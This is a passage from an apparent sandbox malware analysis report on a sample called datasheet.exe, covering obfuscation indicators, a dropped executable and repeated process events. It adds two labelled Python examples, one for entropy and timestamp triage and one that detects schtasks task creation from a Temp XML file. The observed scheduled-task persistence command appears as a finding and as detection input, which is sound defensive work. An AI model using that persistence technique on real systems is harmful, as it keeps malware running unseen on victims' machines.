                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, JLCJHyH6c0QTNYmk86.cs | High entropy of concatenated method names: 'jiOlDKKAgl', 'YwWlosEpSq', 'heBlGYUaPi', 'aiRG6SZHOa', 'p22GzyJCx7', 'h0hlPVjahu', 'yOwlIGLSSi', 'i44l2Xn9Df', 'og6lxhcNNo', 'cr0l50M4oG'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, pTw8yI7DDdtg6G8j6r.cs | High entropy of concatenated method names: 'DcIV9VeE8Y', 'JYtVka90eB', 'X3RVR3jAEc', 'LLBVg3C5Ua', 'b1ZVU1hZ35', 'uTMVQiJORf', 'nEnVHcKfOc', 'yo4Va3y0Y0', 'ln3VA0J0BP', 'H9mVFjwMHJ'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, wwpUJiBXK20C4PEluy.cs | High entropy of concatenated method names: 'ToString', 'H5y3F3J0xw', 'dm83gLbwJS', 'u6w3ylEn5D', 'IlU3Ulh6dL', 'M053QGPUo6', 'n4U3jsRRdu', 'fY53HGyZKQ', 'xMS3aqY5Z5', 'KUd3Zb3UGC'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, t0Ige75P2lbOS8wTrY.cs | High entropy of concatenated method names: 'bQYIlv8H2d', 'i3IIJqa4sE', 'LykIYXACM5', 'qvYIdv214P', 'KqEIC2GEvo', 'rWRI3RpNlT', 'wEaOyK2f8VqpLU5H30', 'icTEnfgwPcVEUjKfhK', 'TQ1IIeC9qk', 'DYmIxgK5Gl'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, YvopWRRRpNlTsh2H4Y.cs | High entropy of concatenated method names: 'm8ZGb1BEE7', 'VWhGOhix1R', 'XOyGLf0FTA', 'mXlGlUnvSF', 'DgPGJ3YhAY', 'wG8LSPDbJm', 'RcmL87LndG', 'uBeLKWhHMX', 'L3SLrQkmnG', 'KiLLEdlMbW'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, mEYI0ez9SpMLMxarLw.cs | High entropy of concatenated method names: 'Yhmw44wf2k', 'F3cw9vgl7F', 'O0RwkL6uyG', 'lelwRBdJjG', 'RxAwgMaB8q', 'R6xwU8LC6J', 'AlpwQI4Rsx', 'ymSwTWXpcl', 'rN5wmliVtT', 'HY6w1RlRW8'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, iU3GhDI5CUbqSQqDMK3.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NxpWsrL3Pj', 'SZjWwBpqYO', 'zb9Wtpc5Wq', 'HTAWWW0Wlg', 'S5jWitBm1P', 'hxKWhP77nk', 'CR3WTMPchJ'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, nrIaPAZ4wK9qnJdwHt.cs | High entropy of concatenated method names: 'oCdlmv8FQs', 'zMYl1S4IM1', 'njMlMggGir', 'vKUl08U50I', 'TchluA3CPT', 'eVLl47xRr8', 'BIXlXcQBtE', 'w85l9r1vZr', 'wdZlkXeuES', 'qmBletjJpl'
                    Source: C:\Users\user\Desktop\datasheet.exe | File created: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe
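                    Three of the static indicators above (the PE timestamp 0xBAD5FF54 that decodes to a date in 2069, the .text section entropy of about 7.98 bits per byte, and the high entropy of the concatenated method names) can be re-derived without the sandbox. The script below is an added example written for this page; it is not part of the Joe Sandbox report, of the sample, or of any Joe Sandbox tooling. It decodes a COFF TimeDateStamp, measures Shannon entropy over a section and over joined identifiers, and applies analyst-chosen cut-offs. The 7.0 and 4.5 thresholds, the minimal constructed PE header, and the byte pattern standing in for a packed .text section are assumptions; the timestamp and the two method-name lists are copied from the report lines above.

```python
"""Static triage for the 'Data Obfuscation' indicators in the report above.

Added example, not part of the Joe Sandbox report or of the sample. It re-derives
three of the findings from first principles so they can be re-checked on any PE
without the sandbox:
  * the COFF TimeDateStamp 0xBAD5FF54 decodes to 30 Apr 2069, a forged,
    future-dated build time ("Binary contains a suspicious time stamp")
  * a .text section with entropy near 8 bits/byte ("section name: .text entropy: 7.98...")
  * high entropy over the concatenated method names of the unpacked .NET code
Standard library only. The PE bytes are a constructed minimal header, not the
real sample; the thresholds are analyst choices, not values taken from the report.
"""
import math
import struct
from collections import Counter
from datetime import datetime, timedelta, timezone
from typing import Iterable, Optional

ENTROPY_PACKED = 7.0        # bits/byte; compiled code sections usually sit well below this
NAME_ENTROPY_SUSPECT = 4.5  # bits/char over joined identifiers; English-like names score lower

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def build_fake_pe_header(timestamp: int) -> bytes:
    """Constructed test input: an MZ stub whose e_lfanew (offset 0x3C) points at a
    'PE\\0\\0' signature followed by a 20-byte COFF file header."""
    stub = bytearray(0x40)
    stub[:2] = b"MZ"
    struct.pack_into("<I", stub, 0x3C, 0x40)
    # Machine=i386, NumberOfSections=3, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x014C, 3, timestamp, 0, 0, 0xE0, 0x0102)
    return bytes(stub) + b"PE\0\0" + coff


def read_pe_timestamp(pe: bytes) -> int:
    """TimeDateStamp sits 8 bytes past the PE signature (after Machine and NumberOfSections)."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    return struct.unpack_from("<I", pe, e_lfanew + 8)[0]


def decode_pe_timestamp(ts: int) -> str:
    """Seconds since the Unix epoch, rendered in UTC (done by hand so 2069 also works where time_t is 32-bit)."""
    return (EPOCH + timedelta(seconds=ts)).strftime("%Y-%m-%d %H:%M:%S UTC")


def is_future_timestamp(ts: int, now: Optional[datetime] = None) -> bool:
    """A build time later than the moment of analysis cannot be genuine."""
    now = now or datetime.now(timezone.utc)
    return EPOCH + timedelta(seconds=ts) > now


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 is the ceiling and is only approached by compressed or encrypted data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def identifier_entropy(names: Iterable[str]) -> float:
    """The sandbox's 'entropy of concatenated method names': join the identifiers
    and measure character entropy. Obfuscators emit near-random alphanumerics."""
    return shannon_entropy("".join(names).encode("utf-8"))


def triage(pe: bytes, text_section: bytes, method_names: Iterable[str]) -> dict:
    """Combine the three checks into one verdict dictionary."""
    names = list(method_names)
    ts = read_pe_timestamp(pe)
    text_e = shannon_entropy(text_section)
    name_e = identifier_entropy(names)
    return {
        "timestamp": decode_pe_timestamp(ts),
        "timestamp_in_future": is_future_timestamp(ts),
        "text_entropy": round(text_e, 3),
        "text_looks_packed": text_e > ENTROPY_PACKED,
        "name_entropy": round(name_e, 3),
        "names_look_obfuscated": name_e > NAME_ENTROPY_SUSPECT,
    }


# Inputs for the demo. The timestamp and both name lists are copied from the
# report; the section bytes are constructed (every byte value equally often).
REPORTED_TIMESTAMP = 0xBAD5FF54
FAKE_PE = build_fake_pe_header(REPORTED_TIMESTAMP)
HIGH_ENTROPY_TEXT = bytes(range(256)) * 16
OBFUSCATED_NAMES = ['jW1GTkRi5s', 'm37Gm5A6K7', 'E1LGMqn9fD', 'T7uG0THAcA', 'DWFG4Lx9bW',
                    'YcOGXtgK0X', 'E8OGkMnpSJ', 'URJGeFoqOp', 'NFVws7UwHHCDsTuLePZ',
                    'YJUiyeUyxhSkQVji6RR']
ORDINARY_NAMES = ['CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Dispose', 'ToString',
                  'ProcessDialogKey']

if __name__ == "__main__":
    for key, value in triage(FAKE_PE, HIGH_ENTROPY_TEXT, OBFUSCATED_NAMES).items():
        print(f"{key:>22}: {value}")
```

                    Run against a real file, read_pe_timestamp takes the whole file's bytes and the section bytes come from the section table; the constructed header here only exercises the parsing path. Note that the two hand-written classes the obfuscator left alone (the ones exposing Dispose, ToString, CanConvertFrom) score well below the cut-off, which is why the report flags method-name entropy per class rather than per assembly.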

                    Boot Survival

                    Source: C:\Users\user\Desktop\datasheet.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp"
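                    The persistence step above imports the task definition from a .tmp file under the user's Temp directory, so the schtasks command line itself reveals neither the action nor the trigger; that combination is what the "Scheduled temp file as task from temp location" Sigma hit in the summary keys on. The following is an added example written for this page, not part of the Joe Sandbox report or of the Sigma rule: it applies the same logic to process-creation command lines as exported from Sysmon or an EDR. The first sample line is the command observed in this run; the other lines, the temp-path markers and the set of value-taking switches are constructed assumptions.

```python
"""Detection logic for the 'Boot Survival' finding: schtasks.exe /Create importing
a task definition from a temp file.

Added example, not part of the Joe Sandbox report or of the Sigma rule it cites
("Scheduled temp file as task from temp location"); it implements the same idea
over process-creation command lines so it can be run against EDR or Sysmon
event exports. The first sample command line is the one the sandbox observed
for datasheet.exe; the others are constructed benign cases. The temp-path
markers and the set of value-taking switches are analyst assumptions.
"""
import re
from typing import List, Optional

# Directories from which a legitimate installer has no reason to import a task XML.
TEMP_PATH_MARKERS = (
    "\\appdata\\local\\temp\\",
    "\\windows\\temp\\",
    "\\temp\\",
)

# schtasks switches that consume the following token as their value.
VALUE_SWITCHES = {"tn", "xml", "tr", "sc", "st", "sd", "mo", "ru", "rp", "s", "u", "p"}

TOKEN_RE = re.compile(r'"[^"]*"|\S+')


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace while keeping quoted paths intact."""
    return [tok.strip('"') for tok in TOKEN_RE.findall(cmdline)]


def parse_schtasks(cmdline: str) -> Optional[dict]:
    """Return {switch: value-or-True} for a schtasks invocation, or None for other images."""
    tokens = tokenize(cmdline)
    if not tokens:
        return None
    image = tokens[0].lower()
    if not (image.endswith("schtasks.exe") or image == "schtasks"):
        return None
    switches = {}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            key = tok[1:].lower()
            has_value = (key in VALUE_SWITCHES and i + 1 < len(tokens)
                         and not tokens[i + 1].startswith("/"))
            switches[key] = tokens[i + 1] if has_value else True
            i += 2 if has_value else 1
        else:
            i += 1
    return switches


def describe_task_creation(cmdline: str) -> Optional[dict]:
    """Flag a /Create whose /XML definition lives in a temp directory; the XML
    carries the action and trigger, so the visible command line shows neither."""
    sw = parse_schtasks(cmdline)
    if not sw or "create" not in sw:
        return None
    xml = sw.get("xml")
    xml_path = xml if isinstance(xml, str) else None
    from_temp = xml_path is not None and any(m in xml_path.lower() for m in TEMP_PATH_MARKERS)
    tn = sw.get("tn")
    return {
        "task_name": tn if isinstance(tn, str) else None,
        "xml_path": xml_path,
        "flagged": from_temp,
    }


def scan(cmdlines: List[str]) -> List[dict]:
    """Run the check over many command lines and keep only the flagged creations."""
    hits = []
    for line in cmdlines:
        info = describe_task_creation(line)
        if info and info["flagged"]:
            info["cmdline"] = line
            hits.append(info)
    return hits


SAMPLE_COMMAND_LINES = [
    # observed in the sandbox run
    r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp"',
    # constructed benign: definition imported from a persistent, non-temp location
    r'schtasks.exe /Create /TN "Backup\Nightly" /XML "C:\ProgramData\Backup\nightly.xml"',
    # constructed benign: action given inline, no XML import at all
    r'schtasks /Create /SC DAILY /TN "Cleanup" /TR "C:\Tools\cleanup.exe" /ST 02:00',
    # constructed: a query, not a creation
    r'schtasks.exe /Query /TN "Updates\EhzaIxEFbjyd"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_COMMAND_LINES):
        print(f"flagged task {hit['task_name']!r} defined by {hit['xml_path']}")
```

                    When this fires, the .tmp file is usually gone by the time an analyst looks; the surviving copy of the definition is the task itself under C:\Windows\System32\Tasks\Updates\, whose Exec action here should point at the dropped EhzaIxEFbjyd.exe in AppData\Roaming.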

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\datasheet.exe | Process information set: NOOPENFILEERRORBOX (44 identical events)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (190 identical events)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
